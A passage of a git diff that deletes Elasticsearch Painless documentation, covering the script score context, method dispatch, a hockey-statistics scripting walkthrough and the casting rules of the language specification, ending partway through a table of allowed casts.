accessible from the script. -index:: The name of an index containing a mapping that is compatible with the document being indexed. - -*Example* - -[source,console] ----------------------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "field": { - "type": "keyword" - } - } - } -} - -POST /_scripts/painless/_execute -{ - "script": { - "source": "doc['field'].value.length() <= params.max_length", - "params": { - "max_length": 4 - } - }, - "context": "filter", - "context_setup": { - "index": "my-index-000001", - "document": { - "field": "four" - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": true -} --------------------------------------------------- - - -===== Score context - -The `score` context executes scripts as if they were executed inside a `script_score` function in -`function_score` query. 
- -The following parameters may be specified in `context_setup` for a score context: - -document:: Contains the document that will be temporarily indexed in-memory and is accessible from the script. -index:: The name of an index containing a mapping that is compatible with the document being indexed. -query:: If `_score` is used in the script then a query can specify that it will be used to compute a score. - -*Example* - -[source,console] ----------------------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "field": { - "type": "keyword" - }, - "rank": { - "type": "long" - } - } - } -} - - -POST /_scripts/painless/_execute -{ - "script": { - "source": "doc['rank'].value / params.max_rank", - "params": { - "max_rank": 5.0 - } - }, - "context": "score", - "context_setup": { - "index": "my-index-000001", - "document": { - "rank": 4 - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": 0.8 -} --------------------------------------------------- diff --git a/docs/painless/painless-guide/painless-method-dispatch.asciidoc b/docs/painless/painless-guide/painless-method-dispatch.asciidoc deleted file mode 100644 index dcb5a5b3cd1..00000000000 --- a/docs/painless/painless-guide/painless-method-dispatch.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[modules-scripting-painless-dispatch]] -=== How painless dispatches functions - -Painless uses receiver, name, and {wikipedia}/Arity[arity] -for method dispatch. For example, `s.foo(a, b)` is resolved by first getting -the class of `s` and then looking up the method `foo` with two parameters. This -is different from Groovy which uses the -{wikipedia}/Multiple_dispatch[runtime types] of the -parameters and Java which uses the compile time types of the parameters. - -The consequence of this that Painless doesn't support overloaded methods like -Java, leading to some trouble when it allows classes from the Java -standard library. For example, in Java and Groovy, `Matcher` has two methods: -`group(int)` and `group(String)`. Painless can't allow both of these methods -because they have the same name and the same number of parameters. So instead it -has `group(int)` and `namedGroup(String)`. - -We have a few justifications for this different way of dispatching methods: - -1. It makes operating on `def` types simpler and, presumably, faster. Using -receiver, name, and arity means that when Painless sees a call on a `def` object it -can dispatch the appropriate method without having to do expensive comparisons -of the types of the parameters. The same is true for invocations with `def` -typed parameters. -2. It keeps things consistent. It would be genuinely weird for Painless to -behave like Groovy if any `def` typed parameters were involved and Java -otherwise. It'd be slow for it to behave like Groovy all the time. -3. It keeps Painless maintainable. Adding the Java or Groovy like method -dispatch *feels* like it'd add a ton of complexity which'd make maintenance and -other improvements much more difficult. 
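A minimal sketch of the `group(int)`/`namedGroup(String)` split described above, assuming regular expressions are enabled (the pattern and group name are made up for illustration):

[source,Painless]
----
Matcher m = /(?<initial>[a-z])[a-z]+/.matcher('gaudreau');
if (m.find()) {
  String byIndex = m.group(1);              // receiver + name + arity resolves to group(int)
  String byName  = m.namedGroup('initial'); // Painless's replacement for Java's group(String)
}
----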
diff --git a/docs/painless/painless-guide/painless-walkthrough.asciidoc b/docs/painless/painless-guide/painless-walkthrough.asciidoc deleted file mode 100644 index f61cc7568dc..00000000000 --- a/docs/painless/painless-guide/painless-walkthrough.asciidoc +++ /dev/null @@ -1,342 +0,0 @@ -[[painless-walkthrough]] -=== A Brief Painless Walkthrough - -To illustrate how Painless works, let's load some hockey stats into an Elasticsearch index: - -[source,console] ----------------------------------------------------------------- -PUT hockey/_bulk?refresh -{"index":{"_id":1}} -{"first":"johnny","last":"gaudreau","goals":[9,27,1],"assists":[17,46,0],"gp":[26,82,1],"born":"1993/08/13"} -{"index":{"_id":2}} -{"first":"sean","last":"monohan","goals":[7,54,26],"assists":[11,26,13],"gp":[26,82,82],"born":"1994/10/12"} -{"index":{"_id":3}} -{"first":"jiri","last":"hudler","goals":[5,34,36],"assists":[11,62,42],"gp":[24,80,79],"born":"1984/01/04"} -{"index":{"_id":4}} -{"first":"micheal","last":"frolik","goals":[4,6,15],"assists":[8,23,15],"gp":[26,82,82],"born":"1988/02/17"} -{"index":{"_id":5}} -{"first":"sam","last":"bennett","goals":[5,0,0],"assists":[8,1,0],"gp":[26,1,0],"born":"1996/06/20"} -{"index":{"_id":6}} -{"first":"dennis","last":"wideman","goals":[0,26,15],"assists":[11,30,24],"gp":[26,81,82],"born":"1983/03/20"} -{"index":{"_id":7}} -{"first":"david","last":"jones","goals":[7,19,5],"assists":[3,17,4],"gp":[26,45,34],"born":"1984/08/10"} -{"index":{"_id":8}} -{"first":"tj","last":"brodie","goals":[2,14,7],"assists":[8,42,30],"gp":[26,82,82],"born":"1990/06/07"} -{"index":{"_id":39}} -{"first":"mark","last":"giordano","goals":[6,30,15],"assists":[3,30,24],"gp":[26,60,63],"born":"1983/10/03"} -{"index":{"_id":10}} -{"first":"mikael","last":"backlund","goals":[3,15,13],"assists":[6,24,18],"gp":[26,82,82],"born":"1989/03/17"} -{"index":{"_id":11}} -{"first":"joe","last":"colborne","goals":[3,18,13],"assists":[6,20,24],"gp":[26,67,82],"born":"1990/01/30"} ----------------------------------------------------------------- -// TESTSETUP - -[discrete] -==== Accessing Doc Values from Painless - -Document values can be accessed from a `Map` named `doc`. - -For example, the following script calculates a player's total goals. This example uses a strongly typed `int` and a `for` loop. - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "function_score": { - "script_score": { - "script": { - "lang": "painless", - "source": """ - int total = 0; - for (int i = 0; i < doc['goals'].length; ++i) { - total += doc['goals'][i]; - } - return total; - """ - } - } - } - } -} ----------------------------------------------------------------- - -Alternatively, you could do the same thing using a script field instead of a function score: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "total_goals": { - "script": { - "lang": "painless", - "source": """ - int total = 0; - for (int i = 0; i < doc['goals'].length; ++i) { - total += doc['goals'][i]; - } - return total; - """ - } - } - } -} ----------------------------------------------------------------- - -The following example uses a Painless script to sort the players by their combined first and last names. The names are accessed using -`doc['first'].value` and `doc['last'].value`. 
- -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "match_all": {} - }, - "sort": { - "_script": { - "type": "string", - "order": "asc", - "script": { - "lang": "painless", - "source": "doc['first.keyword'].value + ' ' + doc['last.keyword'].value" - } - } - } -} ----------------------------------------------------------------- - - -[discrete] -==== Missing values - -`doc['field'].value` throws an exception if -the field is missing in a document. - -To check if a document is missing a value, you can call -`doc['field'].size() == 0`. - - -[discrete] -==== Updating Fields with Painless - -You can also easily update fields. You access the original source for a field as `ctx._source.`. - -First, let's look at the source data for a player by submitting the following request: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "term": { - "_id": 1 - } - } -} ----------------------------------------------------------------- - -To change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update/1 -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = params.last", - "params": { - "last": "hockey" - } - } -} ----------------------------------------------------------------- - -You can also add fields to a document. For example, this script adds a new field that contains -the player's nickname, _hockey_. - -[source,console] ----------------------------------------------------------------- -POST hockey/_update/1 -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = params.last; - ctx._source.nick = params.nick - """, - "params": { - "last": "gaudreau", - "nick": "hockey" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[modules-scripting-painless-dates]] -==== Dates - -Date fields are exposed as -`ZonedDateTime`, so they support methods like `getYear`, `getDayOfWeek` -or e.g. getting milliseconds since epoch with `getMillis`. To use these -in a script, leave out the `get` prefix and continue with lowercasing the -rest of the method name. For example, the following returns every hockey -player's birth year: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "script_fields": { - "birth_year": { - "script": { - "source": "doc.born.value.year" - } - } - } -} ----------------------------------------------------------------- - -[discrete] -[[modules-scripting-painless-regex]] -==== Regular expressions - -NOTE: Regexes are enabled by default as the Setting `script.painless.regex.enabled` -has a new option, `limited`, the default. This defaults to using regular expressions -but limiting the complexity of the regular expressions. Innocuous looking regexes -can have staggering performance and stack depth behavior. But still, they remain an -amazingly powerful tool. In addition, to `limited`, the setting can be set to `true`, -as before, which enables regular expressions without limiting them.To enable them -yourself set `script.painless.regex.enabled: true` in `elasticsearch.yml`. - -Painless's native support for regular expressions has syntax constructs: - -* `/pattern/`: Pattern literals create patterns. This is the only way to create -a pattern in painless. 
The pattern inside the ++/++'s are just -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expressions]. -See <> for more. -* `=~`: The find operator return a `boolean`, `true` if a subsequence of the -text matches, `false` otherwise. -* `==~`: The match operator returns a `boolean`, `true` if the text matches, -`false` if it doesn't. - -Using the find operator (`=~`) you can update all hockey players with "b" in -their last name: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - if (ctx._source.last =~ /b/) { - ctx._source.last += "matched"; - } else { - ctx.op = "noop"; - } - """ - } -} ----------------------------------------------------------------- - -Using the match operator (`==~`) you can update all the hockey players whose -names start with a consonant and end with a vowel: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - if (ctx._source.last ==~ /[^aeiou].*[aeiou]/) { - ctx._source.last += "matched"; - } else { - ctx.op = "noop"; - } - """ - } -} ----------------------------------------------------------------- - -You can use the `Pattern.matcher` directly to get a `Matcher` instance and -remove all of the vowels in all of their last names: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = /[aeiou]/.matcher(ctx._source.last).replaceAll('')" - } -} ----------------------------------------------------------------- - -`Matcher.replaceAll` is just a call to Java's `Matcher`'s -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#replaceAll-java.lang.String-[replaceAll] -method so it supports `$1` and `\1` for replacements: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = /n([aeiou])/.matcher(ctx._source.last).replaceAll('$1')" - } -} ----------------------------------------------------------------- - -If you need more control over replacements you can call `replaceAll` on a -`CharSequence` with a `Function` that builds the replacement. -This does not support `$1` or `\1` to access replacements because you already -have a reference to the matcher and can get them with `m.group(1)`. - -IMPORTANT: Calling `Matcher.find` inside of the function that builds the -replacement is rude and will likely break the replacement process. 
- -This will make all of the vowels in the hockey player's last names upper case: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = ctx._source.last.replaceAll(/[aeiou]/, m -> - m.group().toUpperCase(Locale.ROOT)) - """ - } -} ----------------------------------------------------------------- - -Or you can use the `CharSequence.replaceFirst` to make the first vowel in their -last names upper case: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = ctx._source.last.replaceFirst(/[aeiou]/, m -> - m.group().toUpperCase(Locale.ROOT)) - """ - } -} ----------------------------------------------------------------- - -Note: all of the `_update_by_query` examples above could really do with a -`query` to limit the data that they pull back. While you *could* use a -{ref}/query-dsl-script-query.html[script query] it wouldn't be as efficient -as using any other query because script queries aren't able to use the inverted -index to limit the documents that they have to check. diff --git a/docs/painless/painless-lang-spec.asciidoc b/docs/painless/painless-lang-spec.asciidoc deleted file mode 100644 index aeb1a9d4c75..00000000000 --- a/docs/painless/painless-lang-spec.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[painless-lang-spec]] -== Painless Language Specification - -Painless is a scripting language designed for security and performance. -Painless syntax is similar to Java syntax along with some additional -features such as dynamic typing, Map and List accessor shortcuts, and array -initializers. As a direct comparison to Java, there are some important -differences, especially related to the casting model. For more detailed -conceptual information about the basic constructs that Painless and Java share, -refer to the corresponding topics in the -https://docs.oracle.com/javase/specs/jls/se8/html/index.html[Java Language -Specification]. - -Painless scripts are parsed and compiled using the https://www.antlr.org/[ANTLR4] -and https://asm.ow2.org/[ASM] libraries. Scripts are compiled directly -into Java Virtual Machine (JVM) byte code and executed against a standard JVM. -This specification uses ANTLR4 grammar notation to describe the allowed syntax. -However, the actual Painless grammar is more compact than what is shown here. 
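As an informal illustration of the features mentioned above (dynamic typing, `Map` and
`List` accessor shortcuts, and array initializers), here is a brief sketch with made-up
values; the chapters included below define these constructs precisely:

[source,Painless]
----
def player = new HashMap();                 // dynamic typing: the static type is def
player.last = 'gaudreau';                   // Map accessor shortcut for player.put('last', ...)
player['nick'] = 'hockey';                  // bracket form of the same shortcut

List names = [player.last, player.nick];    // List initializer
String[] copy = new String[] {names[0], names[1]};  // array initializer plus List accessor shortcut
----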
- -include::painless-lang-spec/index.asciidoc[] diff --git a/docs/painless/painless-lang-spec/index.asciidoc b/docs/painless/painless-lang-spec/index.asciidoc deleted file mode 100644 index e75264ff3e4..00000000000 --- a/docs/painless/painless-lang-spec/index.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -include::painless-comments.asciidoc[] - -include::painless-keywords.asciidoc[] - -include::painless-literals.asciidoc[] - -include::painless-identifiers.asciidoc[] - -include::painless-variables.asciidoc[] - -include::painless-types.asciidoc[] - -include::painless-casting.asciidoc[] - -include::painless-operators.asciidoc[] - -include::painless-operators-general.asciidoc[] - -include::painless-operators-numeric.asciidoc[] - -include::painless-operators-boolean.asciidoc[] - -include::painless-operators-reference.asciidoc[] - -include::painless-operators-array.asciidoc[] - -include::painless-statements.asciidoc[] - -include::painless-scripts.asciidoc[] - -include::painless-functions.asciidoc[] - -include::painless-lambdas.asciidoc[] - -include::painless-regexes.asciidoc[] diff --git a/docs/painless/painless-lang-spec/painless-casting.asciidoc b/docs/painless/painless-lang-spec/painless-casting.asciidoc deleted file mode 100644 index 25e7e345ba0..00000000000 --- a/docs/painless/painless-lang-spec/painless-casting.asciidoc +++ /dev/null @@ -1,536 +0,0 @@ -[[painless-casting]] -=== Casting - -A cast converts the value of an original type to the equivalent value of a -target type. An implicit cast infers the target type and automatically occurs -during certain <>. An explicit cast specifies -the target type and forcefully occurs as its own operation. Use the `cast -operator '()'` to specify an explicit cast. - -Refer to the <> for a quick reference on all -allowed casts. - -*Errors* - -* If during a cast there exists no equivalent value for the target type. -* If an implicit cast is given, but an explicit cast is required. - -*Grammar* - -[source,ANTLR4] ----- -cast: '(' TYPE ')' expression ----- - -*Examples* - -* Valid casts. -+ -[source,Painless] ----- -int i = (int)5L; <1> -Map m = new HashMap(); <2> -HashMap hm = (HashMap)m; <3> ----- -+ -<1> declare `int i`; - explicit cast `long 5` to `int 5` -> `int 5`; - store `int 5` to `i` -<2> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m` -<3> declare `HashMap hm`; - load from `m` -> `Map reference`; - explicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - store `HashMap reference` to `hm` - -[[numeric-type-casting]] -==== Numeric Type Casting - -A <> cast converts the value of an original -numeric type to the equivalent value of a target numeric type. A cast between -two numeric type values results in data loss when the value of the original -numeric type is larger than the target numeric type can accommodate. A cast -between an integer type value and a floating point type value can result in -precision loss. 
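For example, an illustrative sketch with assumed values (not part of the original
reference) of where data loss and precision loss occur:

[source,Painless]
----
int big = 300;                 // 300 is outside the byte range [-128, 127]
byte b = (byte)big;            // explicit narrowing cast: data loss, b is 44

long j = 123456789123L;
float f = j;                   // implicit widening cast: the float value loses precision

double d = 3.99;
int i = (int)d;                // explicit cast truncates the fraction: i is 3
----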
- -The allowed casts for values of each numeric type are shown as a row in the -following table: - -|==== -| | byte | short | char | int | long | float | double -| byte | | implicit | implicit | implicit | implicit | implicit | implicit -| short | explicit | | explicit | implicit | implicit | implicit | implicit -| char | explicit | explicit | | implicit | implicit | implicit | implicit -| int | explicit | explicit | explicit | | implicit | implicit | implicit -| long | explicit | explicit | explicit | explicit | | implicit | implicit -| float | explicit | explicit | explicit | explicit | explicit | | implicit -| double | explicit | explicit | explicit | explicit | explicit | explicit | -|==== - -*Examples* - -* Valid numeric type casts. -+ -[source,Painless] ----- -int a = 1; <1> -long b = a; <2> -short c = (short)b; <3> -double e = (double)a; <4> ----- -+ -<1> declare `int a`; - store `int 1` to `a` -<2> declare `long b`; - load from `a` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `b` -<3> declare `short c`; - load from `b` -> `long 1`; - explicit cast `long 1` to `short 1` -> `short 1`; - store `short 1` value to `c` -<4> declare `double e`; - load from `a` -> `int 1`; - explicit cast `int 1` to `double 1.0`; - store `double 1.0` to `e`; - (note the explicit cast is extraneous since an implicit cast is valid) -+ -* Invalid numeric type casts resulting in errors. -+ -[source,Painless] ----- -int a = 1.0; // error <1> -int b = 2; <2> -byte c = b; // error <3> ----- -+ -<1> declare `int i`; - *error* -> cannot implicit cast `double 1.0` to `int 1`; - (note an explicit cast is valid) -<2> declare `int b`; - store `int 2` to `b` -<3> declare byte `c`; - load from `b` -> `int 2`; - *error* -> cannot implicit cast `int 2` to `byte 2`; - (note an explicit cast is valid) - -[[reference-type-casting]] -==== Reference Type Casting - -A <> cast converts the value of an original -reference type to the equivalent value of a target reference type. An implicit -cast between two reference type values is allowed when the original reference -type is a descendant of the target type. An explicit cast between two reference -type values is allowed when the original type is a descendant of the target type -or the target type is a descendant of the original type. - -*Examples* - -* Valid reference type casts. -+ -[source,Painless] ----- -List x; <1> -ArrayList y = new ArrayList(); <2> -x = y; <3> -y = (ArrayList)x; <4> -x = (List)y; <5> ----- -+ -<1> declare `List x`; - store default value `null` to `x` -<2> declare `ArrayList y`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `y`; -<3> load from `y` -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x`; - (note `ArrayList` is a descendant of `List`) -<4> load from `x` -> `List reference`; - explicit cast `List reference` to `ArrayList reference` - -> `ArrayList reference`; - store `ArrayList reference` to `y`; -<5> load from `y` -> `ArrayList reference`; - explicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x`; - (note the explicit cast is extraneous, and an implicit cast is valid) -+ -* Invalid reference type casts resulting in errors. 
-+ -[source,Painless] ----- -List x = new ArrayList(); <1> -ArrayList y = x; // error <2> -Map m = (Map)x; // error <3> ----- -+ -<1> declare `List x`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x` -<2> declare `ArrayList y`; - load from `x` -> `List reference`; - *error* -> cannot implicit cast `List reference` to `ArrayList reference`; - (note an explicit cast is valid since `ArrayList` is a descendant of `List`) -<3> declare `ArrayList y`; - load from `x` -> `List reference`; - *error* -> cannot explicit cast `List reference` to `Map reference`; - (note no cast is valid since neither `List` nor `Map` is a descendant of the - other) - -[[dynamic-type-casting]] -==== Dynamic Type Casting - -A <> cast converts the value of an original -`def` type to the equivalent value of any target type or converts the value of -any original type to the equivalent value of a target `def` type. - -An implicit cast from any original type value to a `def` type value is always -allowed. An explicit cast from any original type value to a `def` type value is -always allowed but never necessary. - -An implicit or explicit cast from an original `def` type value to -any target type value is allowed if and only if the cast is normally allowed -based on the current type value the `def` type value represents. - -*Examples* - -* Valid dynamic type casts with any original type to a target `def` type. -+ -[source,Painless] ----- -def d0 = 3; <1> -d0 = new ArrayList(); <2> -Object o = new HashMap(); <3> -def d1 = o; <4> -int i = d1.size(); <5> ----- -+ -<1> declare `def d0`; - implicit cast `int 3` to `def`; - store `int 3` to `d0` -<2> allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d0` -<3> declare `Object o`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Object reference` - -> `Object reference`; - store `Object reference` to `o` -<4> declare `def d1`; - load from `o` -> `Object reference`; - implicit cast `Object reference` to `def` -> `def`; - store `def` to `d1` -<5> declare `int i`; - load from `d1` -> `def`; - implicit cast `def` to `HashMap reference` -> HashMap reference`; - call `size` on `HashMap reference` -> `int 0`; - store `int 0` to `i`; - (note `def` was implicit cast to `HashMap reference` since `HashMap` is the - child-most descendant type value that the `def` type value - represents) -+ -* Valid dynamic type casts with an original `def` type to any target type. 
-+ -[source,Painless] ----- -def d = 1.0; <1> -int i = (int)d; <2> -d = 1; <3> -float f = d; <4> -d = new ArrayList(); <5> -List l = d; <6> ----- -+ -<1> declare `def d`; - implicit cast `double 1.0` to `def` -> `def`; - store `def` to `d` -<2> declare `int i`; - load from `d` -> `def`; - implicit cast `def` to `double 1.0` -> `double 1.0`; - explicit cast `double 1.0` to `int 1` -> `int 1`; - store `int 1` to `i`; - (note the explicit cast is necessary since a `double` type value is not - converted to an `int` type value implicitly) -<3> store `int 1` to `d`; - (note the switch in the type `d` represents from `double` to `int`) -<4> declare `float i`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - implicit cast `int 1` to `float 1.0` -> `float 1.0`; - store `float 1.0` to `f` -<5> allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `d`; - (note the switch in the type `d` represents from `int` to `ArrayList`) -<6> declare `List l`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -+ -* Invalid dynamic type casts resulting in errors. -+ -[source,Painless] ----- -def d = 1; <1> -short s = d; // error <2> -d = new HashMap(); <3> -List l = d; // error <4> ----- -<1> declare `def d`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `d` -<2> declare `short s`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - *error* -> cannot implicit cast `int 1` to `short 1`; - (note an explicit cast is valid) -<3> allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `d` -<4> declare `List l`; - load from `d` -> `def`; - implicit cast `def` to `HashMap reference`; - *error* -> cannot implicit cast `HashMap reference` to `List reference`; - (note no cast is valid since neither `HashMap` nor `List` is a descendant of - the other) - -[[string-character-casting]] -==== String to Character Casting - -Use the cast operator to convert a <> value into a -<> value. - -*Errors* - -* If the `String` type value isn't one character in length. -* If the `String` type value is `null`. - -*Examples* - -* Casting string literals into `char` type values. -+ -[source,Painless] ----- -char c = (char)"C"; <1> -c = (char)'c'; <2> ----- -+ -<1> declare `char c`; - explicit cast `String "C"` to `char C` -> `char C`; - store `char C` to `c` -<2> explicit cast `String 'c'` to `char c` -> `char c`; - store `char c` to `c` -+ -* Casting a `String` reference into a `char` type value. -+ -[source,Painless] ----- -String s = "s"; <1> -char c = (char)s; <2> ----- -<1> declare `String s`; - store `String "s"` to `s`; -<2> declare `char c` - load from `s` -> `String "s"`; - explicit cast `String "s"` to `char s` -> `char s`; - store `char s` to `c` - -[[character-string-casting]] -==== Character to String Casting - -Use the cast operator to convert a <> value into a -<> value. - -*Examples* - -* Casting a `String` reference into a `char` type value. 
-+ -[source,Painless] ----- -char c = 65; <1> -String s = (String)c; <2> ----- -<1> declare `char c`; - store `char 65` to `c`; -<2> declare `String s` - load from `c` -> `char A`; - explicit cast `char A` to `String "A"` -> `String "A"`; - store `String "A"` to `s` - -[[boxing-unboxing]] -==== Boxing and Unboxing - -Boxing is a special type of cast used to convert a primitive type to its -corresponding reference type. Unboxing is the reverse used to convert a -reference type to its corresponding primitive type. - -Implicit boxing/unboxing occurs during the following operations: - -* Conversions between a `def` type and a primitive type are implicitly - boxed/unboxed as necessary, though this is referred to as an implicit cast - throughout the documentation. -* Method/function call arguments are implicitly boxed/unboxed as necessary. -* A primitive type value is implicitly boxed when a reference type method - is called on it. - -Explicit boxing/unboxing is not allowed. Use the reference type API to -explicitly convert a primitive type value to its respective reference type -value and vice versa. - -*Errors* - -* If an explicit cast is made to box/unbox a primitive type. - -*Examples* - -* Uses of implicit boxing/unboxing. -+ -[source,Painless] ----- -List l = new ArrayList(); <1> -l.add(1); <2> -Integer I = Integer.valueOf(0); <3> -int i = l.get(i); <4> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `l`; -<2> load from `l` -> `List reference`; - implicit cast `int 1` to `def` -> `def`; - call `add` on `List reference` with arguments (`def`); - (note internally `int 1` is boxed to `Integer 1` to store as a `def` type - value) -<3> declare `Integer I`; - call `valueOf` on `Integer` with arguments of (`int 0`) -> `Integer 0`; - store `Integer 0` to `I`; -<4> declare `int i`; - load from `I` -> `Integer 0`; - unbox `Integer 0` -> `int 0`; - load from `l` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - store `int 1` to `i`; - (note internally `int 1` is unboxed from `Integer 1` when loaded from a - `def` type value) -+ -* Uses of invalid boxing/unboxing resulting in errors. -+ -[source,Painless] ----- -Integer x = 1; // error <1> -Integer y = (Integer)1; // error <2> -int a = Integer.valueOf(1); // error <3> -int b = (int)Integer.valueOf(1); // error <4> ----- -+ -<1> declare `Integer x`; - *error* -> cannot implicit box `int 1` to `Integer 1` during assignment -<2> declare `Integer y`; - *error* -> cannot explicit box `int 1` to `Integer 1` during assignment -<3> declare `int a`; - call `valueOf` on `Integer` with arguments of (`int 1`) -> `Integer 1`; - *error* -> cannot implicit unbox `Integer 1` to `int 1` during assignment -<4> declare `int a`; - call `valueOf` on `Integer` with arguments of (`int 1`) -> `Integer 1`; - *error* -> cannot explicit unbox `Integer 1` to `int 1` during assignment - -[[promotion]] -==== Promotion - -Promotion is when a single value is implicitly cast to a certain type or -multiple values are implicitly cast to the same type as required for evaluation -by certain operations. Each operation that requires promotion has a promotion -table that shows all required implicit casts based on the type(s) of value(s). A -value promoted to a `def` type at compile-time is promoted again at run-time -based on the type the `def` value represents. 
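As an informal illustration (assumed values, not part of the formal rules below) of how a
`def` value is promoted again at run-time based on the type it currently represents:

[source,Painless]
----
def x = 1;            // x currently represents an int
def a = x + 2L;       // promoted to long at run-time: a holds long 3

x = 1.5;              // x now represents a double
def b = x + 2L;       // the same expression now promotes to double: b holds double 3.5
----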
- -*Errors* - -* If a specific operation cannot find an allowed promotion type for the type(s) - of value(s) given. - -*Examples* - -* Uses of promotion. -+ -[source,Painless] ----- -double d = 2 + 2.0; <1> -def x = 1; <2> -float f = x + 2.0F; <3> ----- -<1> declare `double d`; - promote `int 2` and `double 2.0 @0`: result `double`; - implicit cast `int 2` to `double 2.0 @1` -> `double 2.0 @1`; - add `double 2.0 @1` and `double 2.0 @0` -> `double 4.0`; - store `double 4.0` to `d` -<2> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x`; -<3> declare `float f`; - load from `x` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - promote `int 1` and `float 2.0`: result `float`; - implicit cast `int 1` to `float 1.0` -> `float `1.0`; - add `float 1.0` and `float 2.0` -> `float 3.0`; - store `float 3.0` to `f`; - (note this example illustrates promotion done at run-time as promotion - done at compile-time would have resolved to a `def` type value) - -[[allowed-casts]] -==== Allowed Casts - -The following tables show all allowed casts. Read the tables row by row, where -the original type is shown in the first column, and each subsequent column -indicates whether a cast to the specified target type is implicit (I), -explicit (E), boxed/unboxed for methods only (A), a reference type cast (@), -or is not allowed (-). See <> -for allowed reference type casts. - -*Primitive/Reference Types* - -[cols="<3,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | O | N | T | b | y | s | c | i | j | f | d | B | Y | S | C | I | J | F | D | R | def -| Object ( O ) | | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | @ | @ | I -| Number ( N ) | I | | - | - | - | - | - | - | - | - | - | - | @ | @ | - | @ | @ | @ | @ | @ | I -| String ( T ) | I | - | | - | - | - | - | - | - | - | - | - | - | - | E | - | - | - | - | - | I -| boolean ( b ) | A | - | - | | - | - | - | - | - | - | - | A | - | - | - | - | - | - | - | - | I -| byte ( y ) | A | A | - | - | | I | E | I | I | I | I | - | A | A | - | A | A | A | A | - | I -| short ( s ) | A | A | - | - | E | | E | I | I | I | I | - | - | A | - | A | A | A | A | - | I -| char ( c ) | A | - | E | - | E | E | | I | I | I | I | - | - | - | A | A | A | A | A | - | I -| int ( i ) | A | A | - | - | E | E | E | | I | I | I | - | - | - | - | A | A | A | A | - | I -| long ( j ) | A | A | - | - | E | E | E | E | | I | I | - | - | - | - | - | A | A | A | - | I -| float ( f ) | A | A | - | - | E | E | E | E | E | | I | - | - | - | - | - | - | A | A | - | I -| double ( d ) | A | A | - | - | E | E | E | E | E | E | | - | - | - | - | - | - | - | A | - | I -| Boolean ( B ) | A | - | - | A | - | - | - | - | - | - | - | | - | - | - | - | - | - | - | @ | I -| Byte ( Y ) | A | I | - | - | A | A | - | A | A | A | A | - | | A | - | A | A | A | A | @ | I -| Short ( S ) | A | I | - | - | - | A | - | A | A | A | A | - | - | | - | A | A | A | A | @ | I -| Character ( C ) | A | - | - | - | - | - | A | A | A | A | A | - | - | - | | A | A | A | A | @ | I -| Integer ( I ) | A | - | - | - | - | - | - | A | A | A | A | - | - | - | - | | A | A | A | @ | I -| Long ( J ) | A | - | - | - | - | - | - | - | A | A | A | - | - | - | - | - | | A | A | @ | I -| Float ( F ) | A | - | - | - | - | - | - | - | - | A | A | - | - | - | - | - | - | | A | @ | I -| Double ( D ) | A | - | - | - | - | - | - | - | - | - 